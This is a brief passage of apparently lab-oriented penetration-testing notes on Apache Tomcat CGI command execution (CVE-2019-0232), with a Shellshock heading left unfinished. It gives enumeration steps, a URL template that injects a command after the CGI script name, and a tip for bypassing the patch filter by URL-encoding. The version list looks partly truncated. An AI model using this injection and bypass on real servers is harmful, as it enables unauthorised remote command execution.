Tomcat CGI
CVE-2019-0232
Tomcat CGI vulnerable versions to Remote Command execution
9.0.0.M1
9.0.17
8.5.0
8.5.39
7.0.0
7.0.9
Steps to reproduce
Use nmap to enumerate specific versions are running on the server
Find the CGI-Script:
http://10.129.204.227:8080/cgi/FUZZ.cmd
http://10.129.204.227:8080/cgi/FUZZ.bat
Execute the command:
http://10.129.204.227:8080/cgi/welcome.bat?&<command>
💡
Apache Tomcat introduced a patch that utilises a regular expression to prevent the use of special characters. However, the filter can be bypassed by URL-encoding the payload.
Shellshock via CGI
It is a security flaw in the Bash shell (GNU Bash up until version 4.3)
Check if is vulnerable
Last updated